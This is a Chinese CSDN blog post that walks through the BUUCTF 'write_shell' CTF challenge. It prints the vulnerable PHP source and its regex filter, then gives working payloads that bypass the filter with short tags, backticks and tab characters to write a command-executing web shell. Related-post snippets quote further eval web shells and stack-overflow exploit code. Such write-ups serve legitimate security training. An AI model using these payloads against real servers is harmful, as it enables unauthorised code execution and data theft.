buuctf-write_shell(命令执行)

最新推荐文章于 2023-10-16 12:16:47 发布
最新推荐文章于 2023-10-16 12:16:47 发布
阅读量311 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/124895856
版权 
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

这道题可以传入两个值,action和data

?action=pwd

输出的是这个页面的储存路径 

 data中传的值会写入index.php中

但是data传的东西会被过滤

if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
        }
}

需要写入的数据:

<?php system('ls \')?>

php被过滤了改成<?= ?>标签

' 被过滤了可以用``代替

空格被过滤了用\t

?action=upload&data=<?=`ls\t/`?>

?action=upload&data=<?=`cat\t/flllllll1112222222lag`?>

 然后查地址就行了 

 或用*代替flllllll1112222222lag,直接查出当前目录下的所有文件

?action=upload&data=<?=`cat\t/*`?>

m0_62094846
关注
buuctf】Online tool 命令执行&RCE&nmap
qq_37301470的博客
11-21 3159
Online tool 被自己蠢到了,一句话上传成功后没看见沙盒地址,一直蚁剑连接失败。。。 有源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_
BUUCTF--[红明谷CTF 2021]write_shell
qq_46263951的博客
07-21 1141
补充知识点: PHP中??的作用 $a??$b; $a是不是null,如果不为null,则返回$a,否则返回$b; PHP中的短标签 先来看第一部分代码, 当action=pwd时则给出路径;当action=upload时,可以上传参数data $dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/'; if(!file_exists($dir)){ mkdir($dir); } switch($_GET["action"] ?
CTFbuuctf web(一)——命令执行
m0_52923241的博客
07-26 2565
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
BUUCTF-Web-命令执行-[ACTF2020 新生赛]Exec
weixin_42566218的博客
03-09 4138
BUUCTF-Web-命令执行-[ACTF2020 新生赛]Exec 题目链接:BUUCTF 类型:命令注入 知识点:命令拼接符(||、;、&&…) 解题过程 这道题目比较简单,打开发现是一个ping命令执行页面,使用post接受参数 测试命令拼接符";"发现未进行过滤,拼接ls命令得到回显 target=127.0.0.1;ls 查看index.php源码发现目标未对参数进行任何过滤 target=127.0.0.1;cp index.php 1.txt 网页
BUUCTF命令执行知识点总结
qq_49833809的博客
11-13 316
命令执行知识点总结
CTF-PWN-buuctf-not_the_same_3dsctf_2016-ROP函数返回到指定位置和ROP-chain的典型使用
serfend's blog
04-20 1502
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:链接:https://pan.baidu.com/s/1Wll80yDkRvz5XMW_xIZRNQ?pwd=uye9 提取码:uye9 答案:flag{c264d02e-6de6-4164-82a6-bdcb6c8ba64f} 总体思路 发现题目存在溢出点,并且给了flag相关的函数 但是此题是静态编译的,有很多其他不必要的函数,可以尝试直接使用ROP-chain方法get-shell 详细步骤 查看文件信
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4330
BUUCTF刷题记录
BUUCTF-WEB
ccfly1012的博客
11-02 3865
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1562
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1479
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
BUUCTF[ACTF2020 新生赛]Exec
stars的博客
11-01 469
文章目录 打开连接发现网站有个ping功能,测试一下 考虑到这里会存在命令执行漏洞,利用它拿到flag 在这里补充一些相关的管道符 1、|(就是按位或),直接执行|后面的语句 2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 3、&(就是按位与),&前面和后面命令都要执行,无论前面真假 4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 5、;(linux下有的,和&一样的作用) 查看根目录发现f
BUUCTF-[红明谷CTF 2021]write_shell
qq_24033605的博客
11-02 544
[红明谷CTF 2021]write_shell 源码放出来了,直接进行代码审计: 从action出发,有两个功能,一是执行pwd,功能是显示当前目录,二是上传upload,通过data变量执行get传参,这里设置了一个waf,对data的内容进行了过滤。 首先进行pwd操作,查看当前目录: 接下来构建shell,这里过滤了php,所以使用短标签<?=?>,过滤了空格,使用\t替换,过滤了eval,使用`执行命令打开根目录下所有文件: /?action=upload&data=&lt
buuctf web入门 命令执行 逆向
weixin_74228275的博客
07-05 636
bin主要放置一些系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等。通过post传参,传入cat flag.php,因为传入的文件一般都存放在tmp文件下,默认文件名为phpXXXXXX(后6个为随机的大小写字母)$((~$({_})))为-1,$((~$(())))$((~$(())))为-2,故可以通过这个构造出36。根据题意,需要构造出36,$(())值为0,因为~a+a=-1。
BUUCTF:[红明谷CTF 2021]write_shell --- php 短标签 + 反引号执行 写入马儿的新方法 --- rce,,yi
Zero_Adam的博客
04-12 1423
一、自己做 data传入值,然后data过waf()。data的值,就是我们写文件的内容,应该就是写马儿了。过滤了php的话,考虑短标签把,然后eval没了, assert或者exec其他的应该都大差不差。 然后就卡壳了,,本地环境打好了,,但是 assert或者exec这些不会用。。 看WP了 二、学到的 PHP短标签:<?php @eval($_POST['a']);?>可以用<?=@eval($_POST['a']);?>代替,PHP短标签 关于PHP的??这个东西:讲
buuctf_Exec
qq_61968245的博客
12-19 908
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges 0x02 题目 打开题目就看到大大的PING,二话不说直接ping个本地ip 涉及知识点: 在命令执行的过程中,可以通过一些常用特殊字符来执行其他语句 ; //命令分割符,即当执行完第一个命令,继续执行下一个命令 | //管道 0x03 解题 那么尝试在当前文...
BUUCTF 命令执行/文件包含类型部分wp
XINO
11-24 7268
BUU差不多前两页题目中的该类型题,可能会有疏漏 [网鼎杯 2020 朱雀组]Nmap 考察nmap的利用 选项 解释 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -append-output 补充保存文件 考虑到之前另一个题 payload 127.0.0.1 | ' <?php @eval($_POST["hack"]);?> -oG hack.php' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_PO
BUUCTF-WriteUp
鱼的博客
02-01 737
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
自己动手写shell命令write
yao_hust_iAC的专栏
10-17 3657
Linux下write命令允许用户跟其他终端上的用户对话。用c语言实现shell命令write,代码如下: #include #include #include #include #include #include #include #include #include char * get_terminal_name(char *); char * get_terminal_
BUUCTF学习(5): 命令执行Ping
最新发布
初尘屿风的博客
10-16 337
-
write_ret = write(serialPort->serial_port_get_filed(), atcmd + write_total, at_len - write_total);这句什么意思
07-13
2. `atcmd + write_total`: 这是一个指针运算,`atcmd` 是一个指向存储要发送数据的缓冲区的指针,`write_total` 是一个表示已经发送的数据长度的变量。该表达式的作用是将指针 `atcmd` 移动到已发送数据的末尾,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值